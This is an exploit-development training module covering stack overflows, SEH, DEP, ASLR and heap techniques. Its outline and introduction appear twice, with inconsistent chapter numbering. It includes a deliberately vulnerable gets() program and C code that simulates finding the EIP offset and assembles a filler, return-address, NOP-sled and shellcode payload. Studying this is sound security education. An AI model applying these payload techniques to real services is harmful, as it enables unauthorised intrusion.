HATSECURE TRAINING #SESSION-1
ADVANCED EXPLOIT DEVELOPMENT
Danang Heriyadi
danang@hatsecure.com
Copyright By Hatsecure Advanced Exploit Development
Disclaimer
Modifying the contents of this module or reproducing it without the author's permission is prohibited.
Copyright By Hatsecure
Table of Contents

Introduction
0x01 Classic Stack Overflow
    Objective
    Overview
    Exercise
    FreeFloat FTP Vulnerability
        Fuzzing: Crash the service
        Fuzzing: Finding the right offset to EIP
        Controlling the EIP
        Taking over the victim
    Conclusion
0x02 Bypassing Structured Exception Handling
    Objective
    Overview
        Structured Exception Handling
        SEH / SafeSEH bypassing theory
        Testing SEH / SafeSEH protection
    Exercise
    All Media Server Vulnerability
        Module instruction mapping
        Returning into our shellcode
    Conclusion
0x03 Bypassing Data Execution Prevention
    Objective
    Overview
        Data Execution Prevention
        DEP bypassing theory
        Testing DEP protection
    Case study: Sami FTP Vulnerability
        Return Oriented Programming
        Defeating DEP with ROP
        Returning into our shellcode
    Conclusion
0x04 Bypassing ASLR in Windows 7
    Objective
    Overview
        Address Space Layout Randomization
        ASLR bypass theory
0x05 Heap Memory Exploitation
    Objective
    Overview
        Heap memory layout
    Case study: Heap spraying Internet Explorer
        Heap spray technique
        Triggering the vulnerability
        Returning into the heap buffer
    Conclusion
0x06 Metasploit Module Development
    Objective
    Overview
        Convert your exploit to a Metasploit module
0x07 Shellcode Development
    Objective
    Overview
        Software required
        Windows API
    Static shellcode writing
        Message Box
        Windows Execute
        Combination shellcode
        Convert your shellcode to a Metasploit module
    Shellcode injection with Metasploit
    Reporting
Introduction
An exploit is a script or program that attacks a computer system through one specific security hole. An exploit often carries a shellcode; the shellcode is the payload, the "ammunition" of the exploit tool.
Exploit tools are nothing new to anyone working as a security practitioner. They can be used to test security legally, that is, with the system owner's authorisation.
In this "Advanced Exploit Development" training we discuss and dissect how a security practitioner finds security holes and writes and develops exploits.
0x01 Classic Stack Overflow
Objective
• Understand the concept of a stack overflow
• Understand debugging methods
• Understand fuzzing (fuzz testing) methods
• Be able to exploit a stack overflow vulnerability
Overview
A stack-based overflow occurs when software writes more data into a stack buffer than the buffer can hold. The excess data overwrites whatever lies beyond the buffer on the stack: other local variables, the saved frame pointer and, most importantly, the saved return address, which the CPU loads into the instruction pointer (EIP on 32-bit x86) when the function returns. Whoever controls that value controls where execution continues.
Example source code containing a stack overflow vulnerability:

#include <stdio.h>

int main(void) {
    char data[20];            /* 20-byte buffer on the stack */
    printf("Enter data: ");
    gets(data);               /* reads until newline with no length limit */
    return 0;
}

When the code above is compiled and executed, the buffer can safely hold at most 19 characters plus the terminating NUL. gets() never checks the length of its input, so anything longer overwrites what follows the buffer on the stack and eventually the saved return address. (gets() was removed from the C11 standard, so recent compilers warn about it or refuse to declare it; it is kept here only because its missing bounds check is the point of the exercise.)
Exercise
Repeat the steps until you understand the concept and the exploitation of a stack overflow.
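The following is an added example, not part of the Hatsecure module, that walks through the two steps the outline calls "Finding the right offset to EIP" and "Controlling the EIP", and puts the hardened form of the read beside the vulnerable one. It assumes a simplified 32-bit frame layout (the 20-byte buffer followed directly by the saved EBP and the saved EIP) and simulates the overflow inside a struct so that it runs deterministically on any host without crashing; all function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed 32-bit frame layout: the buffer sits directly below the saved
 * frame pointer and the saved return address. Modelling the frame as a
 * struct lets the overwrite be observed without undefined behaviour. */
struct frame {
    char     data[20];   /* the vulnerable buffer from the exercise */
    uint32_t saved_ebp;  /* next on the stack: the caller's frame pointer */
    uint32_t saved_eip;  /* then the return address popped into EIP */
};

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...": every 4-byte window is
 * unique within the first 20280 bytes, so the value that lands in EIP
 * identifies its offset in the input. Returns the number of bytes written. */
size_t pattern_create(char *out, size_t len) {
    size_t n = 0;
    for (int a = 'A'; a <= 'Z' && n < len; a++)
        for (int b = 'a'; b <= 'z' && n < len; b++)
            for (int c = '0'; c <= '9' && n < len; c++) {
                char t[3] = { (char)a, (char)b, (char)c };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = t[i];
            }
    return n;
}

/* Locate the 4 bytes that ended up in EIP inside a pattern of the given
 * length (the pattern_offset step). Returns -1 if they are not found. */
long pattern_offset(uint32_t eip, size_t len) {
    char buf[4096];
    char needle[4];
    if (len > sizeof buf) len = sizeof buf;
    size_t n = pattern_create(buf, len);
    memcpy(needle, &eip, 4);  /* bytes in memory order, as the overflow wrote them */
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(buf + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* Stand-in for gets(): copies the whole input with no regard for the
 * 20-byte limit of data[], so bytes 20..27 land in saved_ebp/saved_eip.
 * (Capped at the struct size only so the simulation itself stays defined.) */
void vulnerable_fill(struct frame *f, const char *input, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy(f, input, n);
}

/* Hardened equivalent (what fgets(data, sizeof data, stdin) achieves):
 * copy at most sizeof data - 1 bytes and always NUL-terminate. */
void safe_fill(struct frame *f, const char *input, size_t n) {
    size_t lim = sizeof f->data - 1;
    if (n > lim) n = lim;
    memcpy(f->data, input, n);
    f->data[n] = '\0';
}

/* Step 1: overflow with the cyclic pattern, read the value that reached
 * EIP, recover the offset. With this layout it is 24 (20 data + 4 EBP). */
long find_eip_offset(void) {
    struct frame f;
    char pattern[64];
    size_t n = pattern_create(pattern, sizeof pattern);
    memset(&f, 0, sizeof f);
    vulnerable_fill(&f, pattern, n);
    return pattern_offset(f.saved_eip, n);
}

/* Step 2: pad up to the offset, then place the address we want in EIP.
 * Returns the value the function would return into. */
uint32_t hijack_eip(uint32_t target) {
    struct frame f;
    char payload[28];
    memset(payload, 'A', 24);          /* filler up to the return address */
    memcpy(payload + 24, &target, 4);  /* overwrites saved_eip */
    memset(&f, 0, sizeof f);
    vulnerable_fill(&f, payload, sizeof payload);
    return f.saved_eip;
}

/* The same payload through the bounded reader: the return address survives. */
uint32_t safe_eip(uint32_t target) {
    struct frame f;
    char payload[28];
    memset(payload, 'A', 24);
    memcpy(payload + 24, &target, 4);
    memset(&f, 0, sizeof f);
    f.saved_eip = 0x08048500u;          /* constructed "real" return address */
    safe_fill(&f, payload, sizeof payload);
    return f.saved_eip;
}

int main(void) {
    printf("offset to EIP : %ld\n", find_eip_offset());
    printf("hijacked EIP  : 0x%08x\n", hijack_eip(0x41424344u));
    printf("EIP with fgets: 0x%08x\n", safe_eip(0x41424344u));
    return 0;
}
```

On the real FreeFloat FTP target the value in EIP is read from the debugger after the crash rather than from a struct field, and the offset search is done with mona's or Metasploit's pattern_offset; the logic is the same as above. The bounded reader shows why the fix is a length limit on the copy, not a larger buffer.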

Syllabus Advanced Exploit Development 22-23 June 2013

Table of Contents

Introduction
0x01 Classic stack overflow
    Objective
    Overview
    Exercise
        Free Float FTP vulnerability
        Fuzzing: crash the service
        Fuzzing: finding the right offset to EIP
        Controlling the EIP
        Take over the victim
    Conclusion
0x02 Bypassing Structured Exception Handling
    Objective
    Overview
        Structured Exception Handling
        SEH / SafeSEH bypassing theory
        Testing SEH / SafeSEH protection
    Exercise
        All Media Server vulnerability
        Module instruction mapping
        Returning into our shellcode
    Conclusion
0x03 Bypassing Data Execution Prevention
    Objective
    Overview
        Data Execution Prevention
        DEP bypassing theory
        Testing DEP protection
    Case study: Sami FTP vulnerability
        Return Oriented Programming
        Defeating DEP with ROP
        Returning into our shellcode
    Conclusion
0x03 Bypassing ASLR in Windows 7
    Objective
    Overview
        Address Space Layout Randomization
        ASLR bypass theory
0x04 Heap Memory Exploitation
    Objective
    Overview
        Heap memory layout
    Case study: heap spraying Internet Explorer
        Heap spray technique
        Triggering the vulnerability
        Returning into the heap buffer
    Conclusion
0x05 Metasploit Module Development
    Objective
    Overview
        Convert your exploit to a Metasploit module
0x06 Shellcode Development
    Objective
    Overview
        Software required
        Windows API
    Static shellcode writing
        Message box
        Windows execute
        Combination shellcode
        Convert your shellcode to a Metasploit module
    Shellcode injection with Metasploit
    Reporting
Introduction

An exploit is a script that attacks through one specific security hole in a computer. An exploit often carries a shellcode; the shellcode is the ammunition of the exploit tool. Exploit tools are nothing new to a security practitioner: they can be used to test security legally. In this "advanced exploit development" training we discuss and take apart how a security practitioner finds security holes and writes and develops exploits.
0x01 Classic Stack Overflow

Objective
• Understand the stack overflow concept
• Understand debugging methods
• Understand fuzzing (fuzz testing) methods
• Be able to exploit a stack overflow hole

Overview

A stack-based overflow occurs when software writes more data than a buffer can hold. The excess data overwrites whatever lies next to the buffer on the stack: other local variables, the saved frame pointer and the saved return address. When the function returns, the CPU loads the overwritten return address into EIP, so the attacker decides where execution continues.

Example source code with a stack overflow hole:

    #include <stdio.h>

    int main(void) {
        char data[20];                 /* 20-byte buffer on the stack */
        printf("Masukkan data : ");    /* "Enter data : " */
        gets(data);                    /* no length limit: deliberately vulnerable */
        return 0;
    }

When the source code above is compiled and run, data can hold at most 19 characters plus the terminating NUL that gets() appends; anything longer is written past the end of data and overwrites the adjacent stack contents. gets() was removed from C11 and modern compilers warn about it, which is exactly why the example uses it.

Exercise
Repeat the exercise until you understand the concept and the exploitation of a stack overflow.
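The offset-finding and EIP-control steps listed in this chapter's outline (cyclic pattern, crash, offset, payload), as an added example that is not part of the original training module. It models the 20-byte frame of the snippet above on 32-bit x86 with no stack cookie; the frame layout, the address 0x41414141 standing in for a jmp esp gadget, and the 0xCC bytes standing in for shellcode are assumptions for illustration, and the real offset is always confirmed against the debugger rather than taken from the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of the vulnerable frame: 20 bytes of data, then (32-bit x86,
 * no stack cookie) the saved EBP and the saved return address. Real frames may
 * contain padding, which is why the offset is measured, never assumed. */
struct frame_model {
    char     data[20];
    uint32_t saved_ebp;
    uint32_t ret;      /* loaded into EIP by the function's ret instruction */
};

size_t frame_ret_offset(void) { return offsetof(struct frame_model, ret); }

/* Simulate gets() copying the whole input into the frame. memcpy into the
 * struct keeps this well-defined while reproducing the overwrite; the slot is
 * then read byte-wise, little-endian, the way x86's ret would load it. */
uint32_t simulate_crash(const unsigned char *input, size_t len)
{
    struct frame_model f;
    unsigned char b[4];
    memset(&f, 0, sizeof f);
    f.ret = 0x08048000u;                    /* placeholder legitimate return address */
    size_t n = len < sizeof f ? len : sizeof f;
    memcpy(&f, input, n);
    memcpy(b, &f.ret, 4);
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* Cyclic pattern "Aa0Aa1...Ab0...": every 4-byte window is unique for the
 * first 20280 bytes, so the EIP value at the crash maps to exactly one offset.
 * The caller provides len + 1 bytes for the terminating NUL. */
size_t pattern_create(unsigned char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { u, l, d };
                for (int t = 0; t < 3 && n < len; t++)
                    out[n++] = (unsigned char)trip[t];
            }
    out[n] = '\0';
    return n;
}

/* Given the EIP value read from the debugger, return its offset in the pattern
 * or -1. x86 is little-endian: EIP 0x41386141 means the bytes "Aa8A" landed
 * in the return address slot. */
long pattern_offset(const unsigned char *pat, size_t patlen, uint32_t eip)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(eip >> (8 * i));
    for (size_t off = 0; off + 4 <= patlen; off++)
        if (memcmp(pat + off, needle, 4) == 0)
            return (long)off;
    return -1;
}

/* Classic layout: junk up to the return address, the address of a jmp esp
 * style gadget, a NOP sled, then the shellcode. Bad characters for the target
 * protocol (0x00, 0x0a, 0x0d for most text services) are not handled here.
 * Returns the total length, or 0 if it does not fit in cap. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset,
                     uint32_t ret_addr, size_t nops,
                     const unsigned char *sc, size_t sclen)
{
    size_t total = offset + 4 + nops + sclen;
    if (total > cap) return 0;
    memset(out, 'A', offset);
    for (int i = 0; i < 4; i++)             /* little-endian encoding of the address */
        out[offset + i] = (unsigned char)(ret_addr >> (8 * i));
    memset(out + offset + 4, 0x90, nops);
    memcpy(out + offset + 4 + nops, sc, sclen);
    return total;
}

/* Run the whole chain against the frame model; returns the offset found. */
long demo_offset(uint32_t *eip_out)
{
    unsigned char pat[101];
    size_t plen = pattern_create(pat, 100);
    uint32_t eip = simulate_crash(pat, plen);
    if (eip_out) *eip_out = eip;
    return pattern_offset(pat, plen, eip);
}

uint32_t demo_eip(void) { uint32_t e = 0; demo_offset(&e); return e; }

int main(void)
{
    uint32_t eip;
    long off = demo_offset(&eip);
    if (off < 0) return 1;
    printf("EIP after crash: 0x%08x, offset to EIP: %ld\n", (unsigned)eip, off);

    /* Constructed stand-in shellcode; a real one comes from the shellcode chapter. */
    const unsigned char sc[] = { 0xcc, 0xcc, 0xcc, 0xcc };
    unsigned char payload[256];
    size_t n = build_payload(payload, sizeof payload, (size_t)off,
                             0x41414141u /* hypothetical jmp esp address */,
                             16, sc, sizeof sc);
    printf("payload length: %zu\n", n);
    return 0;
}
```

On the model frame the crash shows EIP = 0x41386141, which pattern_offset resolves to offset 24 (20 bytes of data plus 4 of saved EBP). Against a real target the same two calls are run with the pattern sent over the network and the EIP value copied from the debugger; if the offset they report does not match what the layout suggests, the layout assumption is wrong, not the measurement.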